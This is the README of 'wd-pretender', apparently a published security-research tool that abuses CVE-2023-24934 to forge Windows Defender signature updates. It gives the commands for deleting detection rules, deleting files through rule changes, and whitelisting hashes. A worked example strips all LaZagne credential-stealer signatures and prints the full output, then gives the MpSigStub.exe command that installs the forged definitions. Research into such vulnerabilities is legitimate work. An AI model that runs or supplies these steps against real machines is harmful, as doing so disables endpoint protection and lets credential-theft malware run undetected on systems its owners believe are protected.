Compatible with Windows Defender platform version 4.18.2302.7 and earlier.
wd-pretender is a powerful tool designed to simulate a Windows Defender update using the CVE-2023-24934 vulnerability. This tool is intended for educational and research purposes only and should be used responsibly and with proper authorization.
- Bypass EDR Rules: Bypass certain Windows Defender security measures and remain undetected.
Windows with Python 3.10 with the libraries mentioned in the file requirements.txt
-- Defender-Pretender: v1.0.0 (SafeBreach Labs) --
[ ] Getting Signatures Location ...
usage: wd-pretender.py command [options]
Windows Defender Update
positional arguments:
{bypass,delete,friendly}
bypass bypass windows defender rules by threat name
delete delete file by modifying rules
friendly add hash to friendly files threat
optional arguments:
-h, --help show this help message and exit
-o OUTPUT output folder for the exported vdm files
-d DEFINITIONS_PATH set explicit definitions path
-- Defender-Pretender: v1.0.0 (SafeBreach Labs) --
[ ] Getting Signatures Location ...
usage: wd-pretender.py command [options] bypass [-h] threat_name
positional arguments:
threat_name delete all threats matching <threat_name>
For example we want to bypass LaZagne rules and be able to execute LaZagne without been detected by Windows Defender.
python wd-pretender.py -o C:\BypassDefs bypass lazagne
Output:
python .\wd-pretender.py -o C:\Definitions bypass lazagne
-- Defender-Pretender: v1.0.0 (SafeBreach Labs) --
[ ] Getting Signatures Location ...
[ ] Definitions Path: C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{5235DDA9-EDFD-456F-A39A-88CF98DA5B71}
[ ] Loading mpasbase.vdm
[ ] Loading mpasdlta.vdm
[ ] Loading mpavbase.vdm
[ ] Loading mpavdlta.vdm
[ ] Enumerating Anti-Virus Definitions
[ ] Threats Containing: lazagne
Deleting => b'\xd8!LaZagne'
Deleting => b'HackTool:Python/LaZagne'
Deleting => b'HackTool:Python/LaZagne.A!MTB'
Deleting => b'\xd8!LaZagne!ml'
Deleting => b'HackTool:Python/LaZagne.D!MTB'
Deleting => b'\xcc!Golazagne.A!MTB'
Deleting => b'HackTool:Python/LaZagne.B'
Deleting => b'\xd8!LaZagne!sms'
Deleting => b'\xcc!Lazagne.A!MTB'
Deleting => b'\xcc\xe1Lazagne'
[ ] Enumerating Anti-Spyware Definitions
[ ] Threats Containing: lazagne
[ ] Exporting Definitions into: C:\Definitions
[ ] mpasdlta.vdm: 1.391.491.0 => 1.391.492.0
[ ] mpavdlta.vdm: 1.391.491.0 => 1.391.492.0
[ ] Done!
The output displays the deleted threat rules recorded by the tool, indicating the removal of 10 threats from the Anti-Virus definitions. The newly updated definitions have been exported to the user-supplied export path located at C:\BypassDefs.
To proceed, ensure that MpSigStub.exe is copied to the BypassDefs folder. Following that, execute the following command:
MpSigStub.exe /stub 1.1.18500.10 /payload <defintion_new_version>
The export log generated by wd-pretender confirms the presence of the updated definitions with the version indicated as <definition_new_version>.
To verify the successful update, please refer to the "MpSigStub.log" file located in the Temp folder of the user with whom the execution took place. For instance, if the tool was executed with administrator privileges (although it is not a requirement), the log file can be found at C:\Windows\Temp.
wd-pretender is released under the BSD 3-Clause License. Feel free to modify and distribute this tool responsibly, while adhering to the license terms.